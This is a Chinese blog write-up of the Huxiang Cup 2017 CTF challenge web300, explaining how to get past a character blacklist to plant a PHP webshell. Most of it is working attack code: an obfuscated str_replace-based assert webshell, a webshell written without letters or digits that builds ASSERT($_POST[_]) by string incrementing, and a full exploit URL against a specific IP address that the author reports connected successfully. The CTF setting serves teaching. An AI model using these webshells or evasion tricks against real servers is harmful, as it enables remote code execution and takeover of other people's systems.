湖湘杯 web300 【花样绕waf】【shell的一百种写

作者: EEE渐渐遗忘者 | 来源:发表于2017-12-02 17:40 被阅读0次

湖湘杯 web300 【花样绕waf】【shell的一百种写
Int 0x80 ROP链（x86）
湖湘杯2017
湖湘杯 easyheap
[2018湖湘杯] writesup
湖湘杯 RGB杂项
2019湖湘杯部分WP
[2017湖湘杯] writesup(pwn)
replace ---- 2017湖湘杯Re
水墨江南烟雨处，湘湖如诗写千年

源码

（转自【https://chybeta.github.io/2017/07/15/一道好玩的webshell题/】）

最早在p神博客上看见的：

【https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html#_4】

源码

发现黑名单几乎禁用了所有的的字符.....

写到这里突然还想到之前碰见的这种webshell(当然这里用不了啊，waf肯定就拦住了)

<?php$k = str_replace("8","","a8s88s8e8r8t");$k($_POST["8"]); ?>

利用str_replace 替换8

那么问题来了：

如何编写一个不使用数字和字母的webshell:

通过连续定义变量

$a='abc';

$a.='def';

此时$a=‘abcdef'

通过这样，

<?php

$_=[];

$_=@"$_"; // $_='Array';

$_=$_['!'=='@']; // $_=$_[0];

$___=$_; // A

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

$___.=$__; // S

$___.=$__; // S

$__=$_;

$__++;$__++;$__++;$__++; // E

$___.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R

$___.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$___.=$__;

$____='_';

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$____.=$__;

$_=$$____;

$___($_[_]); // ASSERT($_POST[_]);

http://114.215.71.135:10080/?

content=$_='';$_[+$_]++;$_=$_.'';$__=$_[+''];$_=$__;$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

直接连接成功